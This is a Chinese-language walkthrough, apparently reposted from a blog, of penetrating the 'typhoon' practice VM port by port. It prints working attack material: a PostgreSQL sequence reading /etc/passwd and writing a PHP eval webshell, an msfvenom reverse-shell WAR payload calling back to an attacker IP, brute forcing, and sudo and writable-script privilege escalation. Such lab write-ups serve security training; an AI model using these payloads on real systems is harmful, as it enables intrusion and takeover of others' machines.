您当前的位置:首页 > 电脑百科 > 安全防护 > 网络安全

typhoon靶机渗透

时间:2020-06-10 17:36:07  来源:  作者:

前言&靶机简介

这个靶机挺多漏洞,知识点很广,所以决定自己来打一遍,算是复习一些很久前的知识点,就从一个端口一个端口来渗透吧,看看有什么知识点

端口扫描

typhoon靶机渗透

 

25端口

用户名枚举

为啥选这个端口呢,因为后面要渗透21和22端口很大可能会爆破,25端口版本为Postfix smtpd,可以进行用户名枚举,为后面爆破提供方便

typhoon靶机渗透

 

存在root、typhoon、admin这三个用户

未授权访问

使用nc连接25端口不过貌似不能发邮件

21端口

首先在网上搜了一下vsftpd 3.0.2这个版本有没有什么漏洞,没有结果,于是尝试一些通用的基本操作

ftp匿名访问

探测了一下发现存在ftp匿名访问

typhoon靶机渗透

 

于是登录一下,查看当前路径及列目录

typhoon靶机渗透

 

尝试上传文件

typhoon靶机渗透

 

发现权限不允许,所以21端口暂时没有其它利用方式

ftp爆破

因为知道了存在以上用户,所以使用hydra爆破

typhoon靶机渗透

 

得到了typhoon的密码继续爆破admin的密码,同样成功爆破

typhoon靶机渗透

 

root爆破无果

22端口

账号密码和21端口一样

typhoon靶机渗透

 


typhoon靶机渗透

 

111&2049端口

这是一个NFS服务,测试一下是否存在未授权访问允许挂载文件,确实存在

typhoon靶机渗透

 

查询目标NFS共享目录情况

showmount -e 192.168.80.4
typhoon靶机渗透

 

然后挂载typhoon目录

mount -t nfs 192.168.80.4:/typhoon /tmp/mut/
typhoon靶机渗透

 

445端口

使用enum4linux枚举目标共享信息

enum4linux 192.168.80.4
typhoon靶机渗透

 

也顺便列出了存在的用户名typhoon、admin、postfixuser

typhoon靶机渗透

 

发现允许空账户、空密码登录,共享文件typhoon远程挂载,密码随便输就行

typhoon靶机渗透

 


typhoon靶机渗透

 

5432端口

这个端口是PostgreSQL数据库,尝试爆破一下账号密码账号密码都为postgres

typhoon靶机渗透

 

读/etc/passwd

DROP TABLE if EXISTS ghtwf01;
CREATE TABLE ghtwf01(t TEXT);
COPY ghtwf01 FROM '/etc/passwd';
SELECT * FROM ghtwf01;
typhoon靶机渗透

 

写一句话

创建OID,清空内容

SELECT lo_create(4444);
delete from pg_largeobject where loid=4444;

将一句话木马16进制编码为

3C3F70687020406576616C28245F504F53545B277368656C6C275D293B203F3E

插入

insert into pg_largeobject (loid,pageno,data) values(4444, 0, decode('3C3F70687020406576616C28245F504F53545B277368656C6C275D293B203F3E', 'hex'));

导出数据到指定文件

SELECT lo_export(4444, '/var/www/html/shell.php');
typhoon靶机渗透

 

成功getshell

typhoon靶机渗透

 

6379端口

这个端口是redis,测试一下是否存在未授权访问确实存在

typhoon靶机渗透

 

Redis利用方式有三种

1.Redis写webshell
2.Redis写计划任务反弹shell
3.Redis写ssh公钥

详细见我之前写的一篇Redis利用方式总结:
https://www.ghtwf01.cn/index.php/archives/407/

80端口

drupal Drupalgeddon 2远程代码执行(CVE-2018-7600)

目录扫描发现了它,直接上msf

typhoon靶机渗透

 

LotusCMS 远程代码执行

在cms目录,同样msf

typhoon靶机渗透

 

dvwa

账号密码是默认的admin/password这里面全是洞,直接命令执行弹shell

phpmyadmin

利用dvwa里面的文件包含漏洞或获取dvwa配置文件信息拿到数据库账号密码登录

8080端口

发现是Tomcat,先目录扫描一下,找到后台manager,需要账号密码使用msf爆破一下

typhoon靶机渗透

 

账号密码都为tomcat进入后台发现版本号7.0.52,有上传点,所以就是部署war后门

手动

使用msf生成war包后门

msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.80.130 lport=4444 -f war -o shell.war
typhoon靶机渗透

 

打开发现后门名叫hmmliavgsqxlddq.jsp上传shell.war访问shell/hmmliavgsqxlddq.jsp反弹shell

typhoon靶机渗透

 

自动

msf一把梭

typhoon靶机渗透

 

权限提升

这里演示几种提权方式

内核提权

uname -a查看内核版本

typhoon靶机渗透

 

搜索一下,发现存在内核提权

typhoon靶机渗透

 

然后上传exp,编译运行

typhoon靶机渗透

 

配置不当提权

先切换成bash

Python -c 'import pty;pty.spawn("/bin/bash")'

发现在tab目录下有一个script.sh文件所有用户都可以操作,于是在里面写入反弹shell命令,但是反弹过来的不是root权限,而且返回来的shell还挺难操作,有点迷

typhoon靶机渗透

 


typhoon靶机渗透

 

看到可以使用nc,于是使用msf里面的nc反弹shell

typhoon靶机渗透

 

然后成功反弹shell

typhoon靶机渗透

 


typhoon靶机渗透

 

sudo提权

前提是已经获得当前普通用户的密码,并且当前用户属于sudo组,这里使用的admin用户查看一下sudo权限范围

typhoon靶机渗透

 

因为安全了python,直接

sudo python -c 'import pty;pty.spawn("/bin/bash")'

拿到root权限

typhoon靶机渗透

 

或者sudo -i

typhoon靶机渗透

 

方法很多



Tags:typhoon   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
前言&靶机简介这个靶机挺多漏洞,知识点很广,所以决定自己来打一遍,算是复习一些很久前的知识点,就从一个端口一个端口来渗透吧,看看有什么知识点端口扫描 25端口用户名枚举为啥选...【详细内容】
2020-06-10  Tags: typhoon  点击:(148)  评论:(0)  加入收藏
▌简易百科推荐
(报告出品方:德勤)数字化转型网络安全及转型挑战在任何行业,保持竞争力都需要快速开发新产品和 服务并推向市场。创新型业务模式不仅仅是简单地将现有 流程数字化,其正在覆盖供应...【详细内容】
2021-12-22  认是    Tags:网络安全   点击:(29)  评论:(0)  加入收藏
10月18号, W3C中网络平台孵化器小组(Web Platform Incubator Community Group)公布了HTML Sanitizer API的规范草案。这份草案用来解决浏览器如何解决XSS攻击问题。 网络安全中...【详细内容】
2021-12-07  实战Java  博客园  Tags:脚本攻击   点击:(20)  评论:(0)  加入收藏
一、背景介绍大家在Linux的日常使用中都晓得如何通过命令行去配置Linux的端口开放规则,但是大家知道如何配置Windows入站出站规则吗?有哪些常见的危险端口呢?如何解决上述问题...【详细内容】
2021-12-01  Kali与编程    Tags:防火墙   点击:(30)  评论:(0)  加入收藏
网络安全服务商Randori公司日前发布了一份调查报告,列出了网络攻击者最有可能攻击或利用的IT资产。在遭遇Solarwinds黑客攻击一周年之际,以及在网络安全(尤其是勒索软件和供应...【详细内容】
2021-10-28  企业网D1net   企鹅号  Tags:网络攻击   点击:(57)  评论:(0)  加入收藏
0x01.背景实验利用Dns Administrators 组成员,通过远程配置Dns服务,进行Dll inject从而实现特权提升。 在域内,Dns server 通常为Dc Server,Dns服务器管理基于rpc,通过调用c:\wi...【详细内容】
2021-10-22  IT影子    Tags:特权提升   点击:(37)  评论:(0)  加入收藏
本文主要介绍和总结了CSRF跨站请求伪造的基本原理和主要防范措施,工作中有用到的朋友不妨收藏转发一下,以备您参考。什么是CSRF?CSRF跨站点请求伪造(Cross—Site Request...【详细内容】
2021-10-13  快乐中恒    Tags:CSRF   点击:(49)  评论:(0)  加入收藏
waf拦截在打某市 Hvv 第一天就找到一个文件上传的点,经过测试,可以直接任意文件上传,没有什么道理。 直接尝试上传 Php 文件,被 waf 拦截了 2021最新整理网络安全/渗透测试/安...【详细内容】
2021-10-11  KaliMa    Tags:防火墙   点击:(56)  评论:(0)  加入收藏
应用程序与文件系统的交互始终是高度安全敏感的,因为较小的功能漏洞很容易成为可利用漏洞的来源。这种观察在web文件管理器的情况下尤其正确,其作用是复制完整文件系统的功能...【详细内容】
2021-09-17  IT野涵    Tags:漏洞链   点击:(56)  评论:(0)  加入收藏
您的苹果手机尽管iPhone比Android更安全,但也可以通过各种方式入侵。避免黑客入侵的最佳方法是警惕奇怪的链接或粗略的应用程序,并仅在必要时提供信息。电池寿命差和性能低下...【详细内容】
2021-09-16  Hackers爱好者    Tags:黑客入侵   点击:(633)  评论:(0)  加入收藏
防火墙一般布置在逻辑区域的入口处,位于三层网络架构的核心和汇聚之间,起到隔离逻辑区域,为逻辑区域创建安全策略的作用。 上面就是应用区的防火墙布置方式,他布置在应用区,可以...【详细内容】
2021-09-03  知来知去    Tags:主备模式防火墙   点击:(109)  评论:(0)  加入收藏
相关文章
    无相关信息
最新更新
栏目热门
栏目头条